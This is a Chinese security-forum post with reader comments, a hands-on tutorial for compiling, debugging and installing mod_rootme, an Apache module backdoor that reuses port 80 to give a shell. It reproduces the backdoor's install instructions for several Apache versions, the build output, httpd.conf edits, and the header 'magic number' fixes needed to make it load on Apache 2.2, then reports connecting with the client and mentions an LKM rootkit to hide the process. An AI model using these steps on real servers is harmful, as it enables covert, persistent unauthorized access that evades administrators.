那些年系列 0x02---基于端口复用的apache后门的调试与使用

2013-02-24 23:52:30 31 小飞不会飞 8081

【*】作者:小飞
【*】QQ 5119187

此为系列教材，分为三个部分

0x01---后门隐藏技术的攻与防

0x02---基于端口复用的apache模块后门 mod_rootme的调试与使用

0x03---LKM rootkit的编译与使用

-----------------------------------------------
0x02---基于端口复用的apache模块后门 mod_rootme的调试与使用

这是一个apache的模块化后门，mod_rootme
以pipe的方式获得shell，支持tty
确定是有个so文件进程不能隐藏
不过咱们有LKM rootkit

首先我们来看看后门作者的README
反正每个软件的readme我都是好好读的！

-=[ Target: Apache 1.3.x (Debian) ]=-



        # make <system>

        # cp mod_rootme.so /usr/lib/apache/1.3/

        # vi /etc/apache/httpd.conf (or modules.conf)

        [...]

        LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so



        # apachectl restart





      -=[ Target: Apache 1.3.x (local ) ]=-



        # make <system>

        # cp mod_rootme.so /usr/local/apache/libexec/

        # vi /usr/local/apache/conf/httpd.conf

        [...]

        LoadModule rootme_module      libexec/mod_rootme.so

        [...]

        AddModule mod_rootme.c



        # /usr/local/apache/bin/apachectl restart





      -=[ Target: Apache 2.0.x (Debian) ]=-



        # make <system>

        # cp mod_rootme2.so /usr/lib/apache2/modules/

        # cat > /etc/apache2/mods-enabled/rootme2.load

        LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so

        ^D

        # apache2ctl stop; apache2ctl start





      -=[ Target: Apache 2.0.x (local ) ]=-



        # make <system>

        # cp mod_rootme2.so /usr/local/apache2/modules/

        # vi /usr/local/apache2/conf/httpd.conf

        [...]

        LoadModule rootme2_module modules/mod_rootme2.so



        # PATH=/usr/local/apache2/bin:$PATH; export PATH

        # apachectl stop; apachectl start





      -=[ Target: Apache 2.2.x (Debian) ]=-



        # make <system>

        # cp mod_rootme22.so /usr/lib/apache2/modules/

        # cat > /etc/apache2/mods-enabled/rootme22.load

        LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme22.so

        ^D

        # apache2ctl stop; apache2ctl start





      -=[ Target: Apache 2.2.x (local ) ]=-



        # make <system>

        # cp mod_rootme22.so /usr/local/apache2/modules/

        # vi /usr/local/apache2/conf/httpd.conf

        [...]

        LoadModule rootme2_module modules/mod_rootme22.so



        # PATH=/usr/local/apache2/bin:$PATH; export PATH

        # apachectl stop; apachectl start

首先
看看httpd的目录

root@maf!x:/var/opt$ find  /  -name  httpd.conf

/data/httpd.conf

/etc/httpd/conf/httpd.conf

和版本

恩既然是2.2.3的
就按照上面的来吧

root@maf!x:/tmp$ ls

2.6.18-164             red                    yoco_bc

mod_rootme-0.4.tar.gz  suterusu.tar.gz        yoco_bc.c

nc                     uscreens

root@maf!x:/tmp$ tar zxf  mod_rootme-0.4.tar.gz

root@maf!x:/tmp$ cd mod_rootme-0.4

root@maf!x:/tmp/mod_rootme-0.4$ ls

Makefile        client.exe      httpd22.h       mod_rootme22.c

Makefile32      httpd13.h       mod_rootme.c    mrm_client.c

README.txt      httpd20.h       mod_rootme2.c   mrm_server.h

root@maf!x:/tmp/mod_rootme-0.4$ make linux

gcc -s -fPIC -shared mod_rootme.c  -o mod_rootme.so  -lutil -DLINUX

gcc -s -fPIC -shared mod_rootme2.c -o mod_rootme2.so -lutil -DLINUX

gcc -s -fPIC -shared mod_rootme22.c -o mod_rootme22.so -lutil -DLINUX

gcc -s mrm_client.c -o client

然后

root@maf!x:/etc/httpd/conf$ cp httpd.conf httpd.conf.bak

root@maf!x:/etc/httpd/conf$ vi httpd.conf

在里面
添加LoadModule rootme22_module modules/mod_rootme22.so

然后保存重启httpd服务
谁知道，报错了- -

root@maf!x:/tmp/mod_rootme-0.4$ service httpd restart

&#205;&#163;&#214;&#185; httpd&#163;&#186;                                               [&#200;·&#182;¨]

&#198;&#244;&#182;&#175; httpd&#163;&#186;httpd: Syntax error on line 200 of /etc/httpd/conf/httpd.conf: API module structure `rootme22_module' in file /etc/httpd/modules/mod_rootme22.so is garbled - perhaps this is not an Apache module DSO?

不识别mod_rootme22.so这货？

于是到处找文章
发现某群黑阔博客上面也有一篇介绍这个软件的文章
看半天没看懂。。。（是我太笨吧）
不过下面他引用的文档我看了下
终于懂了文章如下
http://www.nowamagic.net/librarys/veda/detail/1293

就是magic字段错了
于是我们在找到mod22的那个配置文件
http22.h
看下里面的声明

#define MODULE_MAGIC_NUMBER_MAJOR 20020903

#define MODULE_MAGIC_NUMBER_MINOR 7



#define MODULE_MAGIC_COOKIE 0x41503230UL

而2.2其实应该是这样的
#define MODULE_MAGIC_COOKIE 0x41503232UL

看到后激动啊
速度改掉httpd22.h
然后重新make cp
再重启服务
service httpd restart

你妹。。还是报错
不过报错内容不一样了

ok这次我看懂了
又是改参数
改完了应该是这样的

#define MODULE_MAGIC_NUMBER_MAJOR 20051115

#define MODULE_MAGIC_NUMBER_MINOR 7



#define MODULE_MAGIC_COOKIE 0x41503232UL

然后 make cp restart
终于没报错了！！！

然后用另一台服务器
利用里面的client连接

ok成功连上
通信都在80端口
管理你无力了吧

文章有关附件
mod_rootme【原版】
-------------------------------------------------------------------------

文章难免会有错误，希望给位积极指出，进行讨论

同时刚刚接触linux内核的我还有几个问题有待解决
希望有时间的大牛能参与文章的编写和完善
帮解决下有关lkm rootkit几个问题面的声明

---------------------本人上学去了最后一篇文章可能晚点

类别手机无线

关于作者

小飞不会飞22篇文章361篇回复武汉大学信息安全专业学生

离校学生

评论31次

要评论？请先登录或注册

31楼

kenanat
2015-1-12 13:33

找个root权限的试一试

回复|@ta|踩(0)|顶(0)
30楼

Fiend
2015-1-12 13:07

小菜我对代码真的很头疼，但是还要继续学xi，谢谢分享。

回复|@ta|踩(0)|顶(0)
29楼

2014330
2014-4-4 21:27

谢谢分享................

回复|@ta|踩(0)|顶(0)
28楼

google
2014-4-2 17:37

谢谢分享................

回复|@ta|踩(0)|顶(0)
27楼

cc1cc
2014-1-16 09:58

没理解

回复|@ta|踩(0)|顶(0)
26楼

lusiyu
2013-11-7 00:56

不错不错，不过这个要修改配置

回复|@ta|踩(0)|顶(0)
25楼

slls124
2013-9-29 15:24

好东东先收藏

回复|@ta|踩(0)|顶(0)
24楼

IceRainow
2013-8-31 03:30

nginx呢。。。

回复|@ta|踩(0)|顶(0)
23楼

shirly
2013-8-30 12:44

亮点是武汉六中中学生。。。

回复|@ta|踩(0)|顶(0)
22楼

IceRainow
2013-8-30 02:09

感谢分享哈

回复|@ta|踩(0)|顶(0)
21楼

phider
2013-8-29 15:25

APACHE 自己复用自己么。。。。

回复|@ta|踩(0)|顶(0)
20楼
hj4ck
2013-7-25 14:32
权限继承了，也复用了apache的端口，复用了apache 80端口的会话。这有什么可纠结的。而且这个代码获得root权限的思路也非常巧妙
apr_socket_t *client_socket; client_socket = ap_get_module_config( r->connection->conn_config, &core_module); if( client_socket ) fd = client_socket->socketdes;
回复|@ta|踩(0)|顶(0)
19楼

lusiyu
2013-7-23 08:24

学xi

回复|@ta|踩(0)|顶(0)
18楼

scrat
2013-7-19 21:41

- -！看到最后发现楼主居然是学生。。。让我这刚毕业的情何以堪。。。

回复|@ta|踩(0)|顶(0)
17楼

scrat
2013-7-19 21:08

- -!想接触下linux rootkit，谢谢楼主文章

回复|@ta|踩(0)|顶(0)
16楼

dllall
2013-7-17 11:57

学xi了。

回复|@ta|踩(0)|顶(0)
15楼

注册用户
2013-7-17 11:52

呃。那获得的SHELL是交互的么？如果是交互的那也无所谓了。直接su就行了。。

回复|@ta|踩(0)|顶(0)
14楼

小飞不会飞
2013-5-17 20:57

额，你是？你怎么知道？

回复|@ta|踩(0)|顶(0)
13楼

0x27er
2013-5-15 02:33

楼主上学去了

回复|@ta|踩(0)|顶(0)
12楼

小飞不会飞
2013-3-3 07:00

我倒是还有个版本，不用改mod

回复|@ta|踩(0)|顶(0)

那些年系列 0x02---基于端口复用的apache后门的调试与使用

关于作者

评论31次

找个root权限的试一试

小菜我对代码真的很头疼，但是还要继续学xi，谢谢分享。

谢谢分享................

谢谢分享................

没理解

不错不错，不过这个要修改配置

好东东 先收藏

nginx呢。。。

亮点是 武汉六中 中学生。。。

感谢分享哈

APACHE 自己复用自己么。。。。

学xi

- -！看到最后发现楼主居然是学生。。。让我这刚毕业的情何以堪。。。

- -!想接触下linux rootkit，谢谢楼主文章

学xi了。

呃。那获得的SHELL是交互的么？如果是交互的那也无所谓了。直接su就行了。。

额，你是？ 你怎么知道？

楼主上学去了

我倒是还有个版本，不用改mod

热门文章

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

渗透测试车联网攻击链路图

安全资讯黑客入侵自行车：无线换档系统存在漏洞

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

最新回复

精华推荐

渗透测试渗透测试某大型公司局域网

渗透测试记一次域控探索

渗透测试Web中间件常见漏洞总结

Web安全PHP Live Chat 代码审计之组合拳GetShell

渗透测试网站->c段->机房->设备->服务器->ok

好东东先收藏

亮点是武汉六中中学生。。。

额，你是？你怎么知道？